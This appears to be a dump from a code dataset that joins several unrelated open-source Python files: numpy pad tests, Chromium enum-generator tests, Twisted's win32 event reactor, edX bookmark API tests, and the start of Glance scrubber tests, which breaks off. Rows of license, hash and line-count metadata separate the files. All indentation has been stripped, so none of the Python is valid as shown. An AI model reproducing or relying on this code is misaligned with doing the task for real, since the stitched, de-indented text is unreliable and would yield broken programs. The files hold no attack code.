def test_check_empty_array(self):
assert_raises(ValueError, pad, [], 4, mode='reflect')
assert_raises(ValueError, pad, np.ndarray(0), 4, mode='reflect')
assert_raises(ValueError, pad, np.zeros((0, 3)), ((1,), (0,)),
mode='reflect')
class ValueError2(TestCase):
def test_check_negative_pad_amount(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(ValueError, pad, arr, ((-2, 3), (3, 2)),
**kwargs)
class ValueError3(TestCase):
def test_check_kwarg_not_allowed(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, 4, mode='mean',
reflect_type='odd')
def test_mode_not_set(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(TypeError, pad, arr, 4)
def test_malformed_pad_amount(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, (4, 5, 6, 7), mode='constant')
def test_malformed_pad_amount2(self):
arr = np.arange(30).reshape(5, 6)
assert_raises(ValueError, pad, arr, ((3, 4, 5), (0, 1, 2)),
mode='constant')
def test_pad_too_many_axes(self):
arr = np.arange(30).reshape(5, 6)
# Attempt to pad using a 3D array equivalent
bad_shape = (((3,), (4,), (5,)), ((0,), (1,), (2,)))
assert_raises(ValueError, pad, arr, bad_shape,
mode='constant')
class TypeError1(TestCase):
def test_float(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, ((-2.1, 3), (3, 2)))
assert_raises(TypeError, pad, arr, np.array(((-2.1, 3), (3, 2))))
def test_str(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, 'foo')
assert_raises(TypeError, pad, arr, np.array('foo'))
def test_object(self):
class FooBar(object):
pass
arr = np.arange(30)
assert_raises(TypeError, pad, arr, FooBar())
def test_complex(self):
arr = np.arange(30)
assert_raises(TypeError, pad, arr, complex(1, -1))
assert_raises(TypeError, pad, arr, np.array(complex(1, -1)))
def test_check_wrong_pad_amount(self):
arr = np.arange(30)
arr = np.reshape(arr, (6, 5))
kwargs = dict(mode='mean', stat_length=(3, ))
assert_raises(TypeError, pad, arr, ((2, 3, 4), (3, 2)),
**kwargs)
if __name__ == "__main__":
np.testing.run_module_suite()
| gpl-3.0 | -4,079,673,579,535,790,600 | 38.836828 | 78 | 0.373836 | false |
danakj/chromium | build/android/gyp/java_cpp_enum_tests.py | 1 | 16358 | #!/usr/bin/env python
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Tests for enum_preprocess.py.
This test suite contains various tests for the C++ -> Java enum generator.
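The generator consumes C++ headers annotated with GENERATED_JAVA_* directives
(as in the test inputs below) and emits Java classes of @IntDef constants.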
"""
import collections
from datetime import date
import optparse
import os
import sys
import unittest
import java_cpp_enum
from java_cpp_enum import EnumDefinition, GenerateOutput, GetScriptName
from java_cpp_enum import HeaderParser
sys.path.append(os.path.join(os.path.dirname(__file__), "gyp"))
from util import build_utils
class TestPreprocess(unittest.TestCase):
def testOutput(self):
definition = EnumDefinition(original_enum_name='ClassName',
enum_package='some.package',
entries=[('E1', 1), ('E2', '2 << 2')],
comments=[('E2', 'This is a comment.'),
('E1', 'This is a multiple line '
'comment that is really long. '
'This is a multiple line '
'comment that is really '
'really long.')])
output = GenerateOutput('path/to/file', definition)
expected = """
// Copyright %d The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This file is autogenerated by
// %s
// From
// path/to/file
package some.package;
import android.support.annotation.IntDef;
import java.lang.annotation.Retention;
import java.lang.annotation.RetentionPolicy;
public class ClassName {
@IntDef({
E1, E2
})
@Retention(RetentionPolicy.SOURCE)
public @interface ClassNameEnum {}
/**
* %s
* really really long.
*/
public static final int E1 = 1;
/**
* This is a comment.
*/
public static final int E2 = 2 << 2;
}
"""
long_comment = ('This is a multiple line comment that is really long. '
'This is a multiple line comment that is')
self.assertEqual(
expected % (date.today().year, GetScriptName(), long_comment),
output)
def testParseSimpleEnum(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum EnumName {
VALUE_ZERO,
VALUE_ONE,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('EnumName', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('VALUE_ZERO', 0),
('VALUE_ONE', 1)]),
definition.entries)
def testParseBitShifts(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum EnumName {
VALUE_ZERO = 1 << 0,
VALUE_ONE = 1 << 1,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('EnumName', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('VALUE_ZERO', '1 << 0'),
('VALUE_ONE', '1 << 1')]),
definition.entries)
def testParseClassNameOverride(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: OverrideName
enum EnumName {
FOO
};
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: OtherOverride
enum PrefixTest {
PREFIX_TEST_A,
PREFIX_TEST_B,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(2, len(definitions))
definition = definitions[0]
self.assertEqual('OverrideName', definition.class_name)
definition = definitions[1]
self.assertEqual('OtherOverride', definition.class_name)
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1)]),
definition.entries)
def testParseTwoEnums(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum EnumOne {
ENUM_ONE_A = 1,
// Comment there
ENUM_ONE_B = A,
};
enum EnumIgnore {
C, D, E
};
// GENERATED_JAVA_ENUM_PACKAGE: other.package
// GENERATED_JAVA_PREFIX_TO_STRIP: P_
enum EnumTwo {
P_A,
// This comment spans
// two lines.
P_B
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(2, len(definitions))
definition = definitions[0]
self.assertEqual('EnumOne', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('A', '1'),
('B', 'A')]),
definition.entries)
self.assertEqual(collections.OrderedDict([('ENUM_ONE_B', 'Comment there')]),
definition.comments)
definition = definitions[1]
self.assertEqual('EnumTwo', definition.class_name)
self.assertEqual('other.package', definition.enum_package)
self.assertEqual(collections.OrderedDict(
[('P_B', 'This comment spans two lines.')]), definition.comments)
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1)]),
definition.entries)
def testParseThrowsOnUnknownDirective(self):
test_data = """
// GENERATED_JAVA_UNKNOWN: Value
enum EnumName {
VALUE_ONE,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseReturnsEmptyListWithoutDirectives(self):
test_data = """
enum EnumName {
VALUE_ONE,
};
""".split('\n')
self.assertEqual([], HeaderParser(test_data).ParseDefinitions())
def testParseEnumClass(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum class Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseEnumStruct(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum struct Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseFixedTypeEnum(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum Foo : int {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual('int', definition.fixed_type)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseFixedTypeEnumClass(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum class Foo: unsigned short {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual(1, len(definitions))
definition = definitions[0]
self.assertEqual('Foo', definition.class_name)
self.assertEqual('test.namespace', definition.enum_package)
self.assertEqual('unsigned short', definition.fixed_type)
self.assertEqual(collections.OrderedDict([('A', 0)]),
definition.entries)
def testParseUnknownFixedTypeRaises(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: test.namespace
enum class Foo: foo_type {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseSimpleMultiLineDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.namespace)
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: Bar
enum Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual('test.namespace', definitions[0].enum_package)
self.assertEqual('Bar', definitions[0].class_name)
def testParseMultiLineDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (te
// st.name
// space)
enum Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual('test.namespace', definitions[0].enum_package)
def testParseMultiLineDirectiveWithOtherDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.namespace)
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: (
// Ba
// r
// )
enum Foo {
FOO_A,
};
""".split('\n')
definitions = HeaderParser(test_data).ParseDefinitions()
self.assertEqual('test.namespace', definitions[0].enum_package)
self.assertEqual('Bar', definitions[0].class_name)
def testParseMalformedMultiLineDirectiveWithOtherDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.name
// space
// GENERATED_JAVA_CLASS_NAME_OVERRIDE: Bar
enum Foo {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseMalformedMultiLineDirective(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
// test.name
// space
enum Foo {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testParseMalformedMultiLineDirectiveShort(self):
test_data = """
// GENERATED_JAVA_ENUM_PACKAGE: (
enum Foo {
FOO_A,
};
""".split('\n')
with self.assertRaises(Exception):
HeaderParser(test_data).ParseDefinitions()
def testEnumValueAssignmentNoneDefined(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', None)
definition.AppendEntry('C', None)
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1),
('C', 2)]),
definition.entries)
def testEnumValueAssignmentAllDefined(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', '1')
definition.AppendEntry('B', '2')
definition.AppendEntry('C', '3')
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', '1'),
('B', '2'),
('C', '3')]),
definition.entries)
def testEnumValueAssignmentReferences(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', 'A')
definition.AppendEntry('C', None)
definition.AppendEntry('D', 'C')
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 0),
('C', 1),
('D', 1)]),
definition.entries)
def testEnumValueAssignmentSet(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', '2')
definition.AppendEntry('C', None)
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 2),
('C', 3)]),
definition.entries)
def testEnumValueAssignmentSetReferences(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', 'A')
definition.AppendEntry('C', 'B')
definition.AppendEntry('D', None)
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 0),
('C', 0),
('D', 1)]),
definition.entries)
def testEnumValueAssignmentRaises(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', 'foo')
definition.AppendEntry('C', None)
with self.assertRaises(Exception):
definition.Finalize()
def testExplicitPrefixStripping(self):
definition = EnumDefinition(original_enum_name='c', enum_package='p')
definition.AppendEntry('P_A', None)
definition.AppendEntry('B', None)
definition.AppendEntry('P_C', None)
definition.AppendEntry('P_LAST', 'P_C')
definition.prefix_to_strip = 'P_'
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1),
('C', 2),
('LAST', 2)]),
definition.entries)
def testImplicitPrefixStripping(self):
definition = EnumDefinition(original_enum_name='ClassName',
enum_package='p')
definition.AppendEntry('CLASS_NAME_A', None)
definition.AppendEntry('CLASS_NAME_B', None)
definition.AppendEntry('CLASS_NAME_C', None)
definition.AppendEntry('CLASS_NAME_LAST', 'CLASS_NAME_C')
definition.Finalize()
self.assertEqual(collections.OrderedDict([('A', 0),
('B', 1),
('C', 2),
('LAST', 2)]),
definition.entries)
def testImplicitPrefixStrippingRequiresAllConstantsToBePrefixed(self):
definition = EnumDefinition(original_enum_name='Name',
enum_package='p')
definition.AppendEntry('A', None)
definition.AppendEntry('B', None)
definition.AppendEntry('NAME_LAST', None)
definition.Finalize()
self.assertEqual(['A', 'B', 'NAME_LAST'], definition.entries.keys())
def testGenerateThrowsOnEmptyInput(self):
with self.assertRaises(Exception):
original_do_parse = java_cpp_enum.DoParseHeaderFile
try:
java_cpp_enum.DoParseHeaderFile = lambda _: []
for _ in java_cpp_enum.DoGenerate(['file']):
pass
finally:
java_cpp_enum.DoParseHeaderFile = original_do_parse
def main(argv):
parser = optparse.OptionParser()
parser.add_option("--stamp", help="File to touch on success.")
options, _ = parser.parse_args(argv)
suite = unittest.TestLoader().loadTestsFromTestCase(TestPreprocess)
unittest.TextTestRunner(verbosity=0).run(suite)
if options.stamp:
build_utils.Touch(options.stamp)
if __name__ == '__main__':
main(sys.argv[1:])
| bsd-3-clause | 2,689,006,067,536,789,000 | 33.804255 | 80 | 0.585341 | false |
hortonworks/hortonworks-sandbox | desktop/core/ext-py/Twisted/twisted/internet/win32eventreactor.py | 12 | 7652 | # Copyright (c) 2001-2007 Twisted Matrix Laboratories.
# See LICENSE for details.
"""
A win32event based implementation of the Twisted main loop.
This requires win32all or ActivePython to be installed.
Maintainer: Itamar Shtull-Trauring
LIMITATIONS:
1. WaitForMultipleObjects and thus the event loop can only handle 64 objects.
2. Process running has some problems (see Process docstring).
TODO:
1. Event loop handling of writes is *very* problematic (this is causing failed tests).
Switch to doing it the correct way, whatever that means (see below).
2. Replace icky socket loopback waker with event based waker (use dummyEvent object)
3. Switch everyone to using Free Software so we don't have to deal with proprietary APIs.
ALTERNATIVE SOLUTIONS:
- IIRC, sockets can only be registered once. So we switch to a structure
like the poll() reactor, thus allowing us to deal with write events in
a decent fashion. This should allow us to pass tests, but we're still
limited to 64 events.
Or:
- Instead of doing a reactor, we make this an addon to the select reactor.
The WFMO event loop runs in a separate thread. This means no need to maintain
separate code for networking, 64 event limit doesn't apply to sockets,
we can run processes and other win32 stuff in default event loop. The
only problem is that we're stuck with the icky socket based waker.
Another benefit is that this could be extended to support >64 events
in a simpler manner than the previous solution.
The 2nd solution is probably what will get implemented.
"""
# System imports
import time
import sys
from zope.interface import implements
# Win32 imports
from win32file import WSAEventSelect, FD_READ, FD_CLOSE, FD_ACCEPT, FD_CONNECT
from win32event import CreateEvent, MsgWaitForMultipleObjects
from win32event import WAIT_OBJECT_0, WAIT_TIMEOUT, QS_ALLINPUT, QS_ALLEVENTS
import win32gui
# Twisted imports
from twisted.internet import posixbase
from twisted.python import log, threadable, failure
from twisted.internet.interfaces import IReactorFDSet, IReactorProcess
from twisted.internet._dumbwin32proc import Process
class Win32Reactor(posixbase.PosixReactorBase):
"""
Reactor that uses Win32 event APIs.
@ivar _reads: A dictionary mapping L{FileDescriptor} instances to a
win32 event object used to check for read events for that descriptor.
    @ivar _writes: A dictionary mapping L{FileDescriptor} instances to an
        arbitrary value. Keys in this dictionary will be given a chance to
        write out their data.
    @ivar _events: A dictionary mapping win32 event objects to tuples of
L{FileDescriptor} instances and event masks.
"""
implements(IReactorFDSet, IReactorProcess)
dummyEvent = CreateEvent(None, 0, 0, None)
def __init__(self):
self._reads = {}
self._writes = {}
self._events = {}
posixbase.PosixReactorBase.__init__(self)
def _makeSocketEvent(self, fd, action, why):
"""
Make a win32 event object for a socket.
"""
event = CreateEvent(None, 0, 0, None)
WSAEventSelect(fd, event, why)
self._events[event] = (fd, action)
return event
def addEvent(self, event, fd, action):
"""
Add a new win32 event to the event loop.
"""
self._events[event] = (fd, action)
def removeEvent(self, event):
"""
Remove an event.
"""
del self._events[event]
def addReader(self, reader):
"""
Add a socket FileDescriptor for notification of data available to read.
"""
if reader not in self._reads:
self._reads[reader] = self._makeSocketEvent(
reader, 'doRead', FD_READ | FD_ACCEPT | FD_CONNECT | FD_CLOSE)
def addWriter(self, writer):
"""
Add a socket FileDescriptor for notification of data available to write.
"""
if writer not in self._writes:
self._writes[writer] = 1
def removeReader(self, reader):
"""Remove a Selectable for notification of data available to read.
"""
if reader in self._reads:
del self._events[self._reads[reader]]
del self._reads[reader]
def removeWriter(self, writer):
"""Remove a Selectable for notification of data available to write.
"""
if writer in self._writes:
del self._writes[writer]
def removeAll(self):
"""
Remove all selectables, and return a list of them.
"""
return self._removeAll(self._reads, self._writes)
def getReaders(self):
return self._reads.keys()
def getWriters(self):
return self._writes.keys()
def doWaitForMultipleEvents(self, timeout):
log.msg(channel='system', event='iteration', reactor=self)
if timeout is None:
#timeout = INFINITE
timeout = 100
else:
timeout = int(timeout * 1000)
if not (self._events or self._writes):
# sleep so we don't suck up CPU time
time.sleep(timeout / 1000.0)
return
canDoMoreWrites = 0
for fd in self._writes.keys():
if log.callWithLogger(fd, self._runWrite, fd):
canDoMoreWrites = 1
if canDoMoreWrites:
timeout = 0
handles = self._events.keys() or [self.dummyEvent]
val = MsgWaitForMultipleObjects(handles, 0, timeout, QS_ALLINPUT | QS_ALLEVENTS)
if val == WAIT_TIMEOUT:
return
elif val == WAIT_OBJECT_0 + len(handles):
exit = win32gui.PumpWaitingMessages()
if exit:
self.callLater(0, self.stop)
return
elif val >= WAIT_OBJECT_0 and val < WAIT_OBJECT_0 + len(handles):
fd, action = self._events[handles[val - WAIT_OBJECT_0]]
log.callWithLogger(fd, self._runAction, action, fd)
def _runWrite(self, fd):
closed = 0
try:
closed = fd.doWrite()
except:
closed = sys.exc_info()[1]
log.deferr()
if closed:
self.removeReader(fd)
self.removeWriter(fd)
try:
fd.connectionLost(failure.Failure(closed))
except:
log.deferr()
elif closed is None:
return 1
def _runAction(self, action, fd):
try:
closed = getattr(fd, action)()
except:
closed = sys.exc_info()[1]
log.deferr()
if closed:
self._disconnectSelectable(fd, closed, action == 'doRead')
doIteration = doWaitForMultipleEvents
def spawnProcess(self, processProtocol, executable, args=(), env={}, path=None, uid=None, gid=None, usePTY=0, childFDs=None):
"""Spawn a process."""
if uid is not None:
raise ValueError("Setting UID is unsupported on this platform.")
if gid is not None:
raise ValueError("Setting GID is unsupported on this platform.")
if usePTY:
raise ValueError("PTYs are unsupported on this platform.")
if childFDs is not None:
raise ValueError(
"Custom child file descriptor mappings are unsupported on "
"this platform.")
args, env = self._checkProcessArgs(args, env)
return Process(self, processProtocol, executable, args, env, path)
def install():
threadable.init(1)
r = Win32Reactor()
import main
main.installReactor(r)
__all__ = ["Win32Reactor", "install"]
| apache-2.0 | 1,281,924,427,443,840,800 | 30.360656 | 129 | 0.632384 | false |
zhenzhai/edx-platform | openedx/core/djangoapps/bookmarks/tests/test_api.py | 14 | 10243 | """
Tests for bookmarks api.
"""
import ddt
from mock import patch
from nose.plugins.attrib import attr
from unittest import skipUnless
from django.conf import settings
from django.core.exceptions import ObjectDoesNotExist
from opaque_keys.edx.keys import UsageKey
from xmodule.modulestore.exceptions import ItemNotFoundError
from .. import api
from ..models import Bookmark
from openedx.core.djangoapps.bookmarks.api import BookmarksLimitReachedError
from .test_models import BookmarksTestsBase
class BookmarkApiEventTestMixin(object):
""" Mixin for verifying that bookmark api events were emitted during a test. """
def assert_bookmark_event_emitted(self, mock_tracker, event_name, **kwargs):
""" Assert that an event has been emitted. """
mock_tracker.assert_any_call(
event_name,
kwargs,
)
def assert_no_events_were_emitted(self, mock_tracker):
"""
Assert no events were emitted.
"""
self.assertFalse(mock_tracker.called) # pylint: disable=maybe-no-member
@attr('shard_2')
@ddt.ddt
@skipUnless(settings.ROOT_URLCONF == 'lms.urls', 'Tests only valid in LMS')
class BookmarksAPITests(BookmarkApiEventTestMixin, BookmarksTestsBase):
"""
These tests cover the parts of the API methods.
"""
def setUp(self):
super(BookmarksAPITests, self).setUp()
def test_get_bookmark(self):
"""
Verifies that get_bookmark returns data as expected.
"""
bookmark_data = api.get_bookmark(user=self.user, usage_key=self.sequential_1.location)
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmark_data)
# With Optional fields.
with self.assertNumQueries(1):
bookmark_data = api.get_bookmark(
user=self.user,
usage_key=self.sequential_1.location,
fields=self.ALL_FIELDS
)
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmark_data, check_optional_fields=True)
def test_get_bookmark_raises_error(self):
"""
Verifies that get_bookmark raises error as expected.
"""
with self.assertNumQueries(1):
with self.assertRaises(ObjectDoesNotExist):
api.get_bookmark(user=self.other_user, usage_key=self.vertical_1.location)
@ddt.data(
1, 10, 20
)
def test_get_bookmarks(self, count):
"""
Verifies that get_bookmarks returns data as expected.
"""
course, __, bookmarks = self.create_course_with_bookmarks_count(count)
# Without course key.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user)
self.assertEqual(len(bookmarks_data), count + 3)
# Assert them in ordered manner.
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmarks_data[-1])
self.assert_bookmark_data_is_valid(self.bookmark_2, bookmarks_data[-2])
# Without course key, with optional fields.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user, fields=self.ALL_FIELDS)
self.assertEqual(len(bookmarks_data), count + 3)
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(self.bookmark_1, bookmarks_data[-1])
# With course key.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user, course_key=course.id)
self.assertEqual(len(bookmarks_data), count)
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(bookmarks[0], bookmarks_data[-1])
# With course key, with optional fields.
with self.assertNumQueries(1):
bookmarks_data = api.get_bookmarks(user=self.user, course_key=course.id, fields=self.ALL_FIELDS)
self.assertEqual(len(bookmarks_data), count)
self.assert_bookmark_data_is_valid(bookmarks[-1], bookmarks_data[0])
self.assert_bookmark_data_is_valid(bookmarks[0], bookmarks_data[-1])
# Without Serialized.
with self.assertNumQueries(1):
bookmarks = api.get_bookmarks(user=self.user, course_key=course.id, serialized=False)
self.assertEqual(len(bookmarks), count)
self.assertTrue(bookmarks.model is Bookmark) # pylint: disable=no-member
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_create_bookmark(self, mock_tracker):
"""
Verifies that create_bookmark create & returns data as expected.
"""
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 2)
with self.assertNumQueries(9):
bookmark_data = api.create_bookmark(user=self.user, usage_key=self.vertical_2.location)
self.assert_bookmark_event_emitted(
mock_tracker,
event_name='edx.bookmark.added',
course_id=unicode(self.course_id),
bookmark_id=bookmark_data['id'],
component_type=self.vertical_2.location.block_type,
component_usage_id=unicode(self.vertical_2.location),
)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 3)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_create_bookmark_do_not_create_duplicates(self, mock_tracker):
"""
Verifies that create_bookmark do not create duplicate bookmarks.
"""
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 2)
with self.assertNumQueries(9):
bookmark_data = api.create_bookmark(user=self.user, usage_key=self.vertical_2.location)
self.assert_bookmark_event_emitted(
mock_tracker,
event_name='edx.bookmark.added',
course_id=unicode(self.course_id),
bookmark_id=bookmark_data['id'],
component_type=self.vertical_2.location.block_type,
component_usage_id=unicode(self.vertical_2.location),
)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 3)
mock_tracker.reset_mock()
with self.assertNumQueries(5):
bookmark_data_2 = api.create_bookmark(user=self.user, usage_key=self.vertical_2.location)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.course.id)), 3)
self.assertEqual(bookmark_data, bookmark_data_2)
self.assert_no_events_were_emitted(mock_tracker)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_create_bookmark_raises_error(self, mock_tracker):
"""
Verifies that create_bookmark raises error as expected.
"""
with self.assertNumQueries(0):
with self.assertRaises(ItemNotFoundError):
api.create_bookmark(user=self.user, usage_key=UsageKey.from_string('i4x://brb/100/html/340ef1771a0940'))
self.assert_no_events_were_emitted(mock_tracker)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
@patch('django.conf.settings.MAX_BOOKMARKS_PER_COURSE', 5)
    def test_bookmark_more_than_limit_raise_error(self, mock_tracker):
"""
Verifies that create_bookmark raises error when maximum number of units
allowed to bookmark per course are already bookmarked.
"""
max_bookmarks = settings.MAX_BOOKMARKS_PER_COURSE
__, blocks, __ = self.create_course_with_bookmarks_count(max_bookmarks)
with self.assertNumQueries(1):
with self.assertRaises(BookmarksLimitReachedError):
api.create_bookmark(user=self.user, usage_key=blocks[-1].location)
self.assert_no_events_were_emitted(mock_tracker)
# if user tries to create bookmark in another course it should succeed
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.other_course.id)), 1)
api.create_bookmark(user=self.user, usage_key=self.other_chapter_1.location)
self.assertEqual(len(api.get_bookmarks(user=self.user, course_key=self.other_course.id)), 2)
# if another user tries to create bookmark it should succeed
self.assertEqual(len(api.get_bookmarks(user=self.other_user, course_key=blocks[-1].location.course_key)), 0)
api.create_bookmark(user=self.other_user, usage_key=blocks[-1].location)
self.assertEqual(len(api.get_bookmarks(user=self.other_user, course_key=blocks[-1].location.course_key)), 1)
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_delete_bookmark(self, mock_tracker):
"""
Verifies that delete_bookmark removes bookmark as expected.
"""
self.assertEqual(len(api.get_bookmarks(user=self.user)), 3)
with self.assertNumQueries(3):
api.delete_bookmark(user=self.user, usage_key=self.sequential_1.location)
self.assert_bookmark_event_emitted(
mock_tracker,
event_name='edx.bookmark.removed',
course_id=unicode(self.course_id),
bookmark_id=self.bookmark_1.resource_id,
component_type=self.sequential_1.location.block_type,
component_usage_id=unicode(self.sequential_1.location),
)
bookmarks_data = api.get_bookmarks(user=self.user)
self.assertEqual(len(bookmarks_data), 2)
self.assertNotEqual(unicode(self.sequential_1.location), bookmarks_data[0]['usage_id'])
self.assertNotEqual(unicode(self.sequential_1.location), bookmarks_data[1]['usage_id'])
@patch('openedx.core.djangoapps.bookmarks.api.tracker.emit')
def test_delete_bookmark_raises_error(self, mock_tracker):
"""
Verifies that delete_bookmark raises error as expected.
"""
with self.assertNumQueries(1):
with self.assertRaises(ObjectDoesNotExist):
api.delete_bookmark(user=self.other_user, usage_key=self.vertical_1.location)
self.assert_no_events_were_emitted(mock_tracker)
| agpl-3.0 | 8,275,253,265,509,828,000 | 41.502075 | 120 | 0.664649 | false |
openstack/glance | glance/tests/functional/serial/test_scrubber.py | 1 | 16902 | # Copyright 2011-2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import sys
import time
import httplib2
from oslo_config import cfg
from oslo_serialization import jsonutils
from oslo_utils.fixture import uuidsentinel as uuids
from six.moves import http_client
# NOTE(jokke): simplified transition to py3, behaves like py2 xrange
from six.moves import range
from glance import context
import glance.db as db_api
from glance.tests import functional
from glance.tests.utils import execute
CONF = cfg.CONF
class TestScrubber(functional.FunctionalTest):
"""Test that delayed_delete works and the scrubber deletes"""
def setUp(self):
super(TestScrubber, self).setUp()
self.api_server.deployment_flavor = 'noauth'
self.api_server.send_identity_credentials = True
self.admin_context = context.get_admin_context(show_deleted=True)
CONF.set_override('sql_connection', self.api_server.sql_connection)
def _headers(self, custom_headers=None):
base_headers = {
'X-Identity-Status': 'Confirmed',
'X-Auth-Token': '932c5c84-02ac-4fe5-a9ba-620af0e2bb96',
